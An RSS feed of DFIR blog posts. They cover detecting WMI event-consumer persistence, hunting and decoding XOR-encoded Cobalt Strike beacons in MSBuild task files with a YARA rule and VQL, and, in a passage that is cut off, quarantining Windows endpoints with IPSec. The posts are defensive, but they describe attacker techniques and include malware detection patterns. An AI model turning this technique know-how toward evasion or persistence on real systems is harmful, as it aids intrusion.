sitemap.xml

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Matt's DFIR Blog</title>
    <description>A blog for DFIR thoughts, research and for my future reference</description>
    <link>https://mgreen27.github.io/</link>
    <atom:link href="https://mgreen27.github.io/sitemap.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Sun, 13 Nov 2022 13:27:02 +0000</pubDate>
    <lastBuildDate>Sun, 13 Nov 2022 13:27:02 +0000</lastBuildDate>
    <generator>Jekyll v3.8.5</generator>
    
      <item>
        <title>WMI Event Consumers: what are you missing?</title>
        <description>&lt;p&gt;WMI Eventing is a fairly well known technique in DFIR, however some
tools may not provide the coverage you expect. This article covers
WMI eventing visibility and detection including custom namespaces.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/00SelectionBias.png&quot; alt=&quot;Selection bias in WWII: missing what is not collected.&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;background&quot;&gt;Background&lt;/h2&gt;

&lt;p&gt;There has been a fair bit of research and observations of WMI eventing
in field over the last years. In short, a WMI event consumer is a
method of subscribing to certain system events, then enabling an action
of some sort. Common adversary use cases may include persistence, privilege
escalation, or as a collection trigger. Represented as ATT&amp;amp;CK T1546.003
this technique has been observed in use from APT, through to trash-tic
worm and coin miner threats.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/01WMIOverview.png&quot; alt=&quot;WMI Eventing: 3 system classes&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There are three system classes in every active event consumer:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;__EventFilter is a WQL query that outlines the trigger event of
interest.&lt;/li&gt;
  &lt;li&gt;__EventConsumer is an action to perform upon triggering an event.&lt;/li&gt;
  &lt;li&gt;__FilterToConsumerBinding is the registration mechanism that binds
a filter to a consumer.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Most detection will focus on collecting the WMI classes in root/subscription
and, in some tools root/default WMI namespaces.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/02Autoruns.png&quot; alt=&quot;Autoruns 14.07: detects root/default and root/subscription namespace WMI event consumers&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;custom-namespaces&quot;&gt;Custom Namespaces&lt;/h4&gt;

&lt;p&gt;At Blackhat 2018 Lee Christensen and Matt Graeber presented “Subverting
Sysmon: Application of a Formalized Security Product Evasion Methodology”.
This excellent talk focused on defense evasion methodology and highlighted
potential collection gaps in telemetry tools around WMI eventing. In this
case, the focus was on Sysmon behaviour of collection only in
root/subscription, interestingly, it also highlighted the possibility to
implement __EventConsumer classes in arbitrary namespaces.&lt;/p&gt;

&lt;p&gt;It is detection of WMI Event Consumers in arbitrary namespaces that I’m going
to focus. For anyone interested in testing I have written
&lt;a href=&quot;https://github.com/mgreen27/mgreen27.github.io/blob/master/static/other/WMIEventingNoisemaker/WmiEventingNoisemaker.ps1&quot;&gt;a script to generate WMI event consumers&lt;/a&gt;.
This script wraps several powershell functions released during the Black
Hat talk to test creating working event consumers.&lt;/p&gt;

&lt;p&gt;First step was to create a custom namespace event consumer. In this
instance I selected the namespace name &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;totallylegit&lt;/code&gt; and attached an
ActiveScript event consumer.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/04WMIEventGeneration.png&quot; alt=&quot;WMIEventingNoismaker.ps1:Generate active script EventConsumer&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;collection&quot;&gt;Collection&lt;/h2&gt;

&lt;p&gt;Velociraptor has several valuable artifacts for hunting WMI Event
Consumers:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows.Sysinternals.Autoruns&lt;/code&gt; - leverages a thirdparty deployment of
Sysinternals Autoruns and typically my go to ASEP collection artifact but
limited by visibility in root/default and root/subscription only.&lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows.Persistence.PermanentWMIEvents&lt;/code&gt; - recently upgraded to query
all ROOT namespaces.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;This artifact reports currently deployed permanent WMI Event Consumers.&lt;/li&gt;
  &lt;li&gt;The artifact collects Binding information, then presents associated Filters and Consumers.&lt;/li&gt;
  &lt;li&gt;Target a specific namespace, or tick &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;AllRootNamespaces&lt;/code&gt; to collect all
root namespace event consumers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/05collection.png&quot; alt=&quot;Windows.Persistence.PermanentWMIEvents: configuration options&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/05collection_results.png&quot; alt=&quot;Windows.Persistence.PermanentWMIEvents: results&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;telemetry&quot;&gt;Telemetry&lt;/h4&gt;

&lt;p&gt;Unfortunately prior to Windows 10 WMI logging was fairly limited. Sysmon and
other telemetry sources often rely on WMI eventing itself to collect WMI
eventing telemetry events. That means custom classes require namespace and
class existence prior to telemetry subscription. Sysmon as seen below also
does not have coverage for root/default namespace.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/03SysmonEid20.png&quot; alt=&quot;Sysmon collection: Event ID 20 mapping (`__EventConsumer`)&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The good news is since Windows 10, WMI logging has improved significantly
and we can now query the event log: Microsoft-Windows-WMI-Activity or
subscribe the underlying ETW provider of the same name. In the VQL below
I filter the ETW event on event consumer creation or delete operations.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;SELECT
    System.TimeStamp AS EventTime,
    System.ID as EventId,
    strip(prefix='\\\\\.\\',string=EventData.NamespaceName) as NamespaceName,
    EventData.Operation as Operation,
    GetProcessInfo(TargetPid=int(int=EventData.ClientProcessId))[0] as Process
FROM watch_etw(guid=&quot;{1418ef04-b0b4-4623-bf7e-d74ab47bbdaa}&quot;)
WHERE EventId = 11
    AND Operation =~ 'WbemServices::(PutInstance|DeleteInstance|PutClass|DeleteClass)'
    AND Operation =~ 'EventConsumer|EventFilter|FilterToConsumerBinding'
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;I have included a completed artifact in the artifact exchange:
&lt;a href=&quot;https://docs.velociraptor.app/exchange/artifacts/pages/wmieventing/&quot;&gt;Windows.ETW.WMIEventing&lt;/a&gt;.
That artifact includes process enrichment, targeting both creation and deletion of EventConsumers.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/06ETW.png&quot; alt=&quot;Custom namespace provider registration and process enrichment&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/06ETWb.png&quot; alt=&quot;Windows.ETW.WMIEventing: all operations event consumer creation and removal&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;event-log&quot;&gt;Event Log&lt;/h4&gt;

&lt;p&gt;Similar filters can be used with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows.EventLogs.EvtxHunter&lt;/code&gt; for
detection. Its worthy to note, event logs hold less verbose logging for
the registration than ETW but this use case is helpful when coming late
to the party during an investigation.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/07EvtxHunter.png&quot; alt=&quot;Windows.EventLogs.EvtxHunter: hunt for event consumer string&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2022-01-12-wmi-eventing/07EvtxHunterb.png&quot; alt=&quot;Windows.EventLogs.EvtxHunter: detect event consumer class creation&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;conclusions&quot;&gt;Conclusions&lt;/h1&gt;

&lt;p&gt;During this post, we have shown three techniques for detecting WMI event consumers
that are worth considering. We can collect these data-points over an entire
network in minutes using Velociraptor’s “hunt” capability. Similarly
Velociraptor notebook workflow assists excluding known good entries quickly as part of analysis.&lt;/p&gt;

&lt;p&gt;The Velociraptor platform aims to provide visibility and access
to endpoint data. If you would like to try Velociraptor it is available on Github under an open source license.
As always, please file issues on the bug tracker or ask questions on our
mailing list velociraptor-discuss@googlegroups.com. You can also chat with
us directly on discord at https://www.velocidex.com/discord&lt;/p&gt;

&lt;h2 id=&quot;references&quot;&gt;References&lt;/h2&gt;

&lt;ol&gt;
  &lt;li&gt;&lt;a href=&quot;https://docs.microsoft.com/en-us/windows/win32/wmisdk/about-wmi&quot;&gt;Microsoft documentation, About WMI&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T1546/003/&quot;&gt;MITRE ATT&amp;amp;CK T1546.003, Event Triggered Execution: Windows Management Instrumentation Event Subscription&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=R5IEyoFpZq0&quot;&gt;Christensen.L and Graeber.M, Blackhat 2018 - Subverting Sysmon: Application of a Formalized Security Product Evasion Methodology&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/jsecurity101/Windows-API-To-Sysmon-Events/&quot;&gt;JSecurity101, Windows APIs To Sysmon-Events&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
</description>
        <pubDate>Wed, 12 Jan 2022 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html</guid>
        
        <category>DFIR</category>
        
        <category>WMI</category>
        
        <category>Detection</category>
        
        <category>VQL</category>
        
        <category>ASEP</category>
        
        <category>ETW</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Cobalt Strike Payload Discovery And Data Manipulation In VQL</title>
        <description>&lt;p&gt;Velociraptor’s ability for data manipulation is a core platform capability
that drives a lot of the great content we have available in terms of data
parsing for artifacts and live analysis. After a recent engagement with
less common encoded Cobalt Strike beacons, and finding sharable files on
VirusTotal,  I thought it would be a good opportunity to walk through some
workflow around data manipulation with VQL for analysis. In this post I
will walk though some background, collection at scale, and finally talk
about processing target files to extract key indicators.&lt;/p&gt;

&lt;h2 id=&quot;background&quot;&gt;Background&lt;/h2&gt;

&lt;p&gt;The Microsoft Build Engine (MSBuild.exe) is a signed Windows binary that
can  be used to load C# or Visual Basic code via an inline task project
file. Legitimately used in Windows software development, it can handle XML
formatted task files that define requirements for loading and building
Visual Studio configurations. Adversaries can abuse this mechanism for
execution as defence evasion and to bypass application whitelisting -
&lt;a href=&quot;https://attack.mitre.org/techniques/T1127/001/&quot;&gt;ATT&amp;amp;CK T1127&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In this particular engagement, the Rapid7 MDR/IR team responded to an
intrusion in which during lateral movement, the adversary dropped many
variants of an MSBuild inline task file to several machines and then
executed MSBuild via wmi to load an embedded Cobalt Strike beacon.
Detecting an in memory Cobalt Strike beacon is trivial for active threats
with our process based yara and carving content.&lt;/p&gt;

&lt;p&gt;The problem in this case was: how do you discover, then decode these encoded
files on disk quickly to find any additional scope using Velociraptor?&lt;/p&gt;

&lt;h2 id=&quot;collection&quot;&gt;Collection&lt;/h2&gt;

&lt;p&gt;First task is discovery and collecting our files in scope from the network.
Typically this task may be slow to deploy or rely on cobbled together
capabilities from other teams. The Velociraptor hunt is an easy button for
this use case.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/01_new_hunt.png&quot; alt=&quot;Velociraptor GUI : hunt : add hunt&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Velociraptor has several valuable artifacts for hunting over Windows file
systems with yara: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows.Detection.Yara.NTFS&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Generic.Detection.Yara.Glob&lt;/code&gt;
spring to mind readily.  In this instance I am selecting Yara.NTFS. I have
leveraged this artifact in the field for hunting malware, searching logs or
any other capability where both metadata and content based discovery is desired.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;This artifact searches the MFT, returns a list of target files then runs Yara over the target list.&lt;/li&gt;
  &lt;li&gt;The artifact leverages &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows.NTFS.MFT&lt;/code&gt; so similar regex filters can be applied including Path, Size and date.&lt;/li&gt;
  &lt;li&gt;The artifact also has an option to search across all attached drives and upload any files with Yara hits.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Some examples of path regex may include:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Extension at a path: Windows/System32/.+\.dll$&lt;/li&gt;
  &lt;li&gt;More wildcards: Windows/.+/.+\.dll$&lt;/li&gt;
  &lt;li&gt;Specific file: Windows/System32/kernel32.dll$&lt;/li&gt;
  &lt;li&gt;
    &lt;table&gt;
      &lt;tbody&gt;
        &lt;tr&gt;
          &lt;td&gt;Multiple extentions: .(php&lt;/td&gt;
          &lt;td&gt;aspx&lt;/td&gt;
          &lt;td&gt;resx&lt;/td&gt;
          &lt;td&gt;asmx)$&lt;/td&gt;
        &lt;/tr&gt;
      &lt;/tbody&gt;
    &lt;/table&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/02_find_artifact.png&quot; alt=&quot;Select artifact : Windows.Detection.Yara.NTFS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The file filter: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows/Temp/[^/]*\.TMP$&lt;/code&gt; will suffice in this case to target
our adversaries path for payloads before applying our yara rule. Typically when
running discovery like this, an analyst can also apply additional options like
file size or time stamp bounds for use at scale and optimal performance.
The yara rule deployed in this case was simply quick and dirty hex conversion of
text directly from the project file referencing the unique variable setup that
was common across acquired samples.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-yara&quot;&gt;rule MSBuild_buff {
   meta:
      description = &quot;Detect unique variable setup MSBuild inline task project file&quot;
      author = &quot;Matt Green - @mgreen27&quot;
      date = &quot;2021-10-22&quot;
   strings:
    // byte[] buff = new byte[]
    $buff = { 62 79 74 65 5b 5d 20 62 75 66 66 20 3d 20 6e 65 77 20 62 79 74 65 5b 5d }

    // byte[] key_code = new byte[]
    $key_code = { 62 79 74 65 5b 5d 20 6b 65 79 5f 63 6f 64 65 20 3d 20 6e 65 77 20 62 79 74 65 5b 5d }

condition:
      any of them
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/03_configure_artifact.png&quot; alt=&quot;Windows.Detection.Yara.NTFS hunt configuration&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After launching the hunt, results become available inside the hunt entry on the
Velociraptor server for download or additional analysis.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/04_hunt_results.png&quot; alt=&quot;Hunt results&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;payload-decode&quot;&gt;Payload decode&lt;/h2&gt;
&lt;p&gt;The Cobalt Strike payload is a string with represented characters xor encoded
as a hex formatted buffer and key in embedded C Sharp code as seen below.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/05_payload_b.png&quot; alt=&quot;MSBuild inline task project file with CobaltStrike payload&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;enumerate-collected-files-and-find-location-on-server&quot;&gt;Enumerate collected files and find location on server&lt;/h3&gt;
&lt;p&gt;So far we have only collected files that have suspicious content. Now we want
to post process the result and try to extract more information from the payload.&lt;/p&gt;

&lt;p&gt;The Velociraptor notebook is a gui component that lets the user run VQL directly
on the server. In this case we are leveraging the notebook attached to our hunt
to post process results opposed to downloading the files and processing offline.&lt;/p&gt;

&lt;p&gt;Our first step of decode is to examine all the files we collected in the hunt.
The first query enumerates all the individual collections in the hunt, while the
second query retrieves the files collected for each job.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;-- find flow ids for each client
LET hunt_flows = SELECT *, Flow.client_id as ClientId, Flow.session_id as FlowId
FROM hunt_flows(hunt_id='H.C6508PLOOPD2U')

-- extract uploaded files and path on server
Let targets = SELECT  * FROM foreach(row=hunt_flows,
    query={
        SELECT
            file_store(path=vfs_path) as SamplePath,
            file_size as SampleSize
        FROM uploads(client_id=ClientId,flow_id=FlowId)
    })

SELECT * FROM targets
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/06_notebook_files.png&quot; alt=&quot;Find the location of all files collected&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;extract-encoded-payload-and-xor-key&quot;&gt;Extract encoded payload and xor key&lt;/h3&gt;
&lt;p&gt;For the second step, to extract target bytes we leverage the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parse_records_with_regex()&lt;/code&gt;
plugin to extract the strings of interest (Data and Key) in our target files.
Note: the buffer_size argument allows VQL to examine a larger buffer than the
default size in order to capture the typically very large payloads in these build
files. We have also included a 200 character limitation on the data field initially
as this will improve performance when working on VQL. We have also specified buffer
size to be larger than default and just larger than the biggest payload in scope.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;-- regex to extract Data and Key fields
LET target_regex = 'buff = new byte\\[\\]\\s*{(?P&amp;lt;Data&amp;gt;[^\\n]*)};\\s+byte\\[\\]\\s+key_code = new byte\\[\\]\\s*{(?P&amp;lt;Key&amp;gt;[^\\n]*)};\\n'

SELECT * FROM foreach(row=targets,
    query={
        SELECT
            basename(path=SamplePath) as Sample,
            SampleSize,
            Key, --obtained from regex
            read_file(filename=Data,accessor='data',length=200) as DataExtract -- obtained by regex, only output 200 characters
        FROM parse_records_with_regex(
            file=SamplePath,buffer_size=15000000,
            regex=target_regex)
    })
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parse_records_with_regex()&lt;/code&gt; is a VQL plugin that parses a file with a set of regexp and yields matches as records. The file is read into a large buffer. Then each regular expression is applied to the buffer, and all matches are emitted as rows.&lt;/p&gt;

&lt;p&gt;The regular expressions are specified in the Go syntax. They are expected to contain capture variables to name the matches extracted.&lt;/p&gt;

&lt;p&gt;The aim of this plugin is to split the file into records which can be further parsed. For example, if the file consists of multiple records, this plugin can be used to extract each record, while &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;parse_string_with_regex()&lt;/code&gt; can be used to further split each record into elements. This works better than trying to write a more complex regex which tries to capture a lot of details in one pass.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/07_notebook_regex.png&quot; alt=&quot;VQL: extract data and keys&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;extract-normalisation&quot;&gt;Extract normalisation&lt;/h3&gt;

&lt;p&gt;The third step adds a custom function for hex normalisation and converts the inline
C Sharp style encoding to a standard hex encoded string which VQL can easily parse.
In this case, the local normalise function will ensure we have  valid 2 character hex.
The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;regex_replace()&lt;/code&gt; will strip the leading ‘0x’ from the hex strings and prepare for
xor processing.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;-- regex to extract Data and Key fields
LET target_regex = 'buff = new byte\\[\\]\\s*{(?P&amp;lt;Data&amp;gt;[^\\n]*)};\\s+byte\\[\\]\\s+key_code = new byte\\[\\]\\s*{(?P&amp;lt;Key&amp;gt;[^\\n]*)};\\n'

-- normalise function to fix bad hex strings
LET normalise_hex(value) = regex_replace(source=value,re='0x(.)[,}]',replace='0x0\$1,')

SELECT * FROM foreach(row=targets,
    query={
        SELECT
            basename(path=SamplePath) as Sample,
            SampleSize,
            regex_replace(re=&quot;0x|,&quot;, replace=&quot;&quot;, source=normalise_hex(value=Key)) as KeyNormalised,
            regex_replace(re=&quot;0x|,&quot;, replace=&quot;&quot;, source=normalise_hex(value=Data)) as DataNormalised
        FROM parse_records_with_regex(
            file=SamplePath,buffer_size=15000000,
            regex=target_regex)
    })
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/08_notebook_normalise.png&quot; alt=&quot;VQL: hex normalisation&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;extract-to-bytes&quot;&gt;Extract to bytes&lt;/h3&gt;

&lt;p&gt;The fourth step converts hex to bytes and validates that the next stage is working. In the example VQL below
we pass the hex text to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;unhex()&lt;/code&gt; function to produce raw bytes for our variables.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;SELECT * FROM foreach(row=targets,
    query={
        SELECT
            basename(path=SamplePath) as Sample,
            SampleSize,
            unhex(string=regex_replace(re=&quot;0x|,&quot;, replace=&quot;&quot;, source=normalise_hex(value=Key))) as KeyBytes,
            read_file(filename=
                unhex(string=regex_replace(re=&quot;0x|,&quot;, replace=&quot;&quot;, source=normalise_hex(value=Data))),
                    accessor='data',length=200) as DataBytesExtracted
        FROM parse_records_with_regex(
            file=SamplePath,buffer_size=15000000,
            regex=target_regex)
    })
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/09_notebook_bytes.png&quot; alt=&quot;VQL: extract bytes&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;xor-decode&quot;&gt;Xor decode&lt;/h3&gt;

&lt;p&gt;VQL’s flexibility comes with its ability to reuse existing artifacts in different ways.
The fifth step is running Velociraptor’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;xor()&lt;/code&gt; function and piping the output into our
the existing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Windows.Carving.CobaltStrike()&lt;/code&gt; configuration decoder.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;-- extract bytes
LET bytes &amp;lt;= SELECT * FROM foreach(row=targets,
    query={
        SELECT
            SamplePath, basename(path=SamplePath) as Sample, SampleSize,
            unhex(string=regex_replace(re=&quot;0x|,&quot;, replace=&quot;&quot;, source=normalise_hex(value=Key))) as KeyBytes,
            read_file(filename=
                unhex(string=regex_replace(re=&quot;0x|,&quot;, replace=&quot;&quot;, source=normalise_hex(value=Data))),
                    accessor='data') as DataBytes
        FROM parse_records_with_regex(
            file=SamplePath,buffer_size=15000000,
            regex=target_regex)
    })

-- pass bytes to cobalt strike parser and format key indicators im interested in
SELECT *, FROM foreach(row=bytes,query={
    SELECT *,
        basename(path=SamplePath) as Sample,SampleSize
    FROM Artifact.Windows.Carving.CobaltStrike(TargetBytes=xor(key=KeyBytes,string=DataBytes))
})
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/10_notebook_parse.png&quot; alt=&quot;VQL: parse config&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Decoded Cobalt Strike configuration is clearly observed.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/11_notebook_config_example.png&quot; alt=&quot;Cobalt strike configuration example&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The smallest file also includes a Cobalt Strike shellcode stager, which I have recently
added to the Velociraptor Cobalt Strike parser.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/12_notebook_shellcode_example.png&quot; alt=&quot;Cobalt strike shellcode example&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;additional-analysis&quot;&gt;Additional analysis&lt;/h3&gt;

&lt;p&gt;Finally, we may have a desire to extract specific key indicators and compare across
samples. A simple data stack on key indicators of interest.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-vql&quot;&gt;-- pass bytes to cobalt strike parser and format key indicators im interested in
LET cobalt = SELECT *, FROM foreach(row=bytes,query={
    SELECT
        basename(path=SamplePath) as Sample,SampleSize,
        Hash as DecodeHash,
        Rule,Offset,Xor,DecodedConfig
    FROM Artifact.Custom.Windows.Carving.CobaltStrike(TargetBytes=xor(key=KeyBytes,string=DataBytes))
})

-- quick data stack on a few things to show sample analysis
SELECT count() as Total,
    if(condition= Xor=~'^0x(2e|69)$', then=DecodedConfig.BeaconType, else= 'Shellcode stager') as Type,
    if(condition= Xor=~'^0x(2e|69)$', then=DecodedConfig.LicenseId, else= DecodedConfig.Licence) as License,
    if(condition= Xor=~'^0x(2e|69)$', then=dict(SpawnTox86=DecodedConfig.SpawnTox86,SpawnTox64=DecodedConfig.SpawnTox64), else= 'N/A') as SpawnTo,
    if(condition= Xor=~'^0x(2e|69)$', then=DecodedConfig.Port, else= 'N/A') as Port,
    if(condition= Xor=~'^0x(2e|69)$', then=DecodedConfig.C2Server, else= DecodedConfig.Server) as Server
FROM cobalt
GROUP BY Type, Licence,SpawnTo,Port,Server
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2021-11-21-cobalt/13_notebook_example.png&quot; alt=&quot;VQL results: key indicators of interest&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;/h2&gt;

&lt;p&gt;In this post we showed discovery, then decode of encoded Cobalt Strike beacons on disk.
Velociraptor can read, manipulate and enrich data efficiently across a large network
without the overhead of needing to extract and process manually.&lt;/p&gt;

&lt;p&gt;Whilst most traditional workflows concentrate on collection and offline analysis,
Velociraptor notebook also enables data manipulation and flexibility in analysis.
If you would like to try out these features in Velociraptor, It is available on
&lt;a href=&quot;https://github.com/Velocidex/velociraptor&quot;&gt;GitHub&lt;/a&gt; under an open source license. 
Please follow the project or ask questions on our mailing list
velociraptor-discuss@googlegroups.com. You can also chat with us directly on 
&lt;a href=&quot;https://www.velocidex.com/discord&quot;&gt;discord&lt;/a&gt;.&lt;/p&gt;
</description>
        <pubDate>Tue, 09 Nov 2021 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2021/11/09/VQL.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2021/11/09/VQL.html</guid>
        
        <category>DFIR</category>
        
        <category>detection</category>
        
        <category>cobaltstrike</category>
        
        <category>VQL</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Windows IPSEC for endpoint quarantine</title>
        <description>&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2020-07-23-IPSEC/00quarantine.png&quot; /&gt;&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;This post is going to talk about using Windows IPSec for a quarantine use case. Im going to explain the background, how to configure a policy and some of the design decisions as I was initially looking at building an endpoint based containment capability for Velociraptor.&lt;/p&gt;

&lt;h3 id=&quot;background&quot;&gt;Background&lt;/h3&gt;
&lt;p&gt;As a consultant part of our workflow may be to contain a machine whilst we carry out an investigation. There are often complexities when carrying out cross team tasks so any capability that enables remote management typically saves time and resources. Most modern EDR has some kind of quarantine capability built in, however my current goto endpoint IR tool does not. Im looking for a scriptable, native tool based containment capability that can be deployed via Velociraptor.&lt;/p&gt;

&lt;p&gt;IPSec has been included in every Microsoft Windows operating system since Windows 2000. Most practitioners believe IPSec as a purely VPN based technology, however the Windows implementation enables additional endpoint focused IP Security. In addition to encryption and authentication, IPSec uses the same engine as Windows Firewall so can be used for packet filtering. With these capabilities in mind, IPSec adds some nice options for teams looking to implement best practices in host based segmentation.&lt;/p&gt;

&lt;p&gt;IPSec can be configured via Group Policy Object, Local Security Policy, Powershell, or Netsh in modern windows versions. This post will only focus on my use case of IPSec as a local policy deployment. Although Powershell is the goto tool for administration of Windows systems, its support is lacking for IPSec configuration prior to Windows 2012R2. For this reason, I decided to use the built in Netsh tool which has support for IPsec from Windows 7 through to the current iterations of Windows 10 / Server.&lt;/p&gt;

&lt;p&gt;Even though this post is not covering all the IPSec use cases. I have included some links in my resources section for anyone interested in more information and best practice around centralised group policy based configuration.&lt;/p&gt;

&lt;h3 id=&quot;ipsec-policy-definitions&quot;&gt;IPSec policy definitions&lt;/h3&gt;
&lt;p&gt;First of all, we need to understand what makes up an IPSec policy.&lt;/p&gt;

&lt;p&gt;Netsh IPSec can be deployed in 2 different modes - Dynamic and Static:  &lt;br /&gt;
&lt;strong&gt;Dynamic&lt;/strong&gt; - Is applied to current state and is not a persistent configuration.&lt;br /&gt;
&lt;strong&gt;Static&lt;/strong&gt; - Is applied as a policy and is simply a container for one or more rules. When enabled the policy populates the dynamic configuration and persists across reboot. When deleted, all objects attached to the policy are removed.&lt;/p&gt;

&lt;p&gt;One of my requirements was to enable policy removal with minimal changes to current configuration. Using netsh static IPSec policies, we have a simplified process that can be built, applied and removed cleanly.&lt;/p&gt;

